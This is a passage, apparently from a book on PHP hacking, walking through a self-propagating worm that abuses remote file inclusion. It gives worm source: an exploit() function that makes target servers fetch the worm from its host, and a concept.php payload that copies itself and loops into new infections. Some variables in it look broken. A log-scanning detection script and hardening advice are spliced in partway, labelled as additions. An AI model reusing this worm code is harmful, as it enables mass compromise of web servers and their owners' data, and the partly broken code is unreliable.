The exploit($str) function takes one parameter: a string containing the URL of a page that might be vulnerable to PHP source code injection.
In that URL, the placeholder [*STRING*] stands in for the value of the potentially vulnerable parameter.
In essence, an infection attempt consists of sending the request http://site1/test.php?aaa=http://site2/concept.php?&bbb=ccc instead of http://site1/test.php?aaa=[*STRING*]&bbb=ccc . Here, site1 is the URL of the site that the worm is trying to infect, and site2 is the address of the script that is currently executing (the worm's own copy).
So, the exploit() function could be as follows.
exploit($str)

```php
function exploit($str)
{
    global $_SERVER, $HTTP_SERVER_VARS;
    $th = $_SERVER["SCRIPT_URI"];
    if (empty($th)) $th = $HTTP_SERVER_VARS["SCRIPT_URI"];
    if (empty($th)) $th = getenv("SCRIPT_URI");   // Getting the URL of the site
    if (!preg_match("/domain\.com/", $str)) exit;
    $str = str_replace("[*STRING*]", "$th?", $str);
    $str .= "&from=" . $_SERVER["SCRIPT_URI"];
    file($str);   // Initialization is done
}
```
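The request pattern above is also what a defender should look for: a query-string parameter whose value is itself a URL (or a PHP stream wrapper such as php:// or data://) on a script that includes files by name. The following is an added detection example, not code from the book or from the worm; it scans constructed Apache-style access-log lines (the sample lines, host names and the `from=` parameter are assumptions for illustration) and reports every parameter whose value parses as a remote URL or wrapper, URL-encoded values included.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format). Line 2 mirrors the
# infection request described in the text; line 3 is the same request with the
# value URL-encoded and an ftp scheme; lines 1 and 4 are benign traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /test.php?aaa=news&bbb=ccc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /test.php?aaa=http://site2/concept.php?&bbb=ccc&from=http://site2/concept.php HTTP/1.1" 200 512 "-" "-"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /test.php?aaa=ftp%3A%2F%2Fsite2%2Fconcept.php&bbb=ccc HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
"""

# Extracts the request line ("GET /path?query HTTP/1.1") from a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Schemes and stream wrappers that should never arrive as a parameter value on a
# script that passes the value to include()/require()/file(): remote fetches and
# wrappers that let the caller supply executable source.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "expect"}


def suspicious_params(target):
    """Return (name, value) pairs from the request target whose value looks like a URL."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl percent-decodes, so ftp%3A%2F%2F... is seen as ftp://...
    for name, value in parse_qsl(query, keep_blank_values=True):
        scheme = urlsplit(value).scheme.lower()
        if scheme in REMOTE_SCHEMES:
            hits.append((name, value))
    return hits


def scan_log(text):
    """Scan access-log text and return one finding per request carrying URL-valued parameters."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "path": urlsplit(m.group("target")).path,
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} -> {f['path']} {f['params']}")
```

A hit on a parameter such as `aaa` is the signal that the included-file name is attacker-controlled; the fix on the application side is to map the parameter onto a fixed list of local files rather than pass it to include() or file(), and to keep allow_url_fopen/allow_url_include disabled in php.ini so that a URL value cannot fetch remote source in the first place.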
Here, it is assumed that when the script (the concept.php file) is requested without parameters, it returns PHP code that will be executed on the target server.
http://site/concept.php

```php
<?
if (file_exists("concept.php")) exit;   // To avoid infecting one server repeatedly
$f = fopen("concept.php", "w");
$a = "<? // The source code of exploit.php ?> ";
fwrite($f, $a);
$th = $_SERVER["SCRIPT_URI"];
if (empty($th)) $th = $HTTP_SERVER_VARS["SCRIPT_URI"];
if (empty($th)) $th = getenv("SCRIPT_URI");
preg_match("/^(https?\:\/\/.*)\/(.*?)/", $th, $r);
$a = $r[1] . "/concept.php?expl=yes";
file($a);
?>
```
It only remains to write the code that outputs this result.
concept.php

```php
<?
$tmpname = "concept.php";
echo "<? ";
$th2 = $_SERVER["SCRIPT_FILENAME"];
if (empty($th2)) $th2 = $HTTP_SERVER_VARS["SCRIPT_FILENAME"];
if (empty($th2)) $th2 = getenv("SCRIPT_FILENAME");
echo " if(file_exists(\"$tmpname\")) exit;
$f=fopen(\"$tmpname\", \"w\");
$a=\"" . str_replace("$", "\$", addslashes(implode("", file($th2)))) . "\";
fwrite($f, $a);
$th=\$_SERVER[\"SCRIPT_URI\"];
if(empty($th)) $th=$HTTP_SERVER_VARS[\"SCRIPT_URI\"];
if(empty($th)) $th=getenv(\"SCRIPT_URI\");
preg_match(\"/^(https?\:\/\/.*)\/?(.*?)/\", $th, $r);
$a=$r[1].\"/$thisname?expl=yes\";
file($a); ?> ";
?>
```
When the http://site/concept.php?expl=yes request is sent, it closes the loop, and reproduction starts over from the beginning.
http://site/concept.php?expl=yes

```php
if ($_GET["doexpl"] == "yes" || $HTTP_GET_VARS["doexpl"] == "yes") {
    global $c, $_GET, $HTTP_GET_VARS, $_SERVER, $HTTP_SERVER_VARS;
    initsettings();
    searchandexpl();   // The next iteration
    $countthis = (int)($_GET["countthis"] | $HTTP_GET_VARS["countthis"]);
    if ($countthis == 0) $countthis = $c;
    $countthis--;
    $th = $_SERVER["SCRIPT_URI"];
    if (empty($th)) $th = $HTTP_SERVER_VARS["SCRIPT_URI"];
    if (empty($th)) $th = getenv("SCRIPT_URI");
    if ($countthis >= 1) file("$th?doexpl=modeok&countthis=$countthis");
    exit;
}
```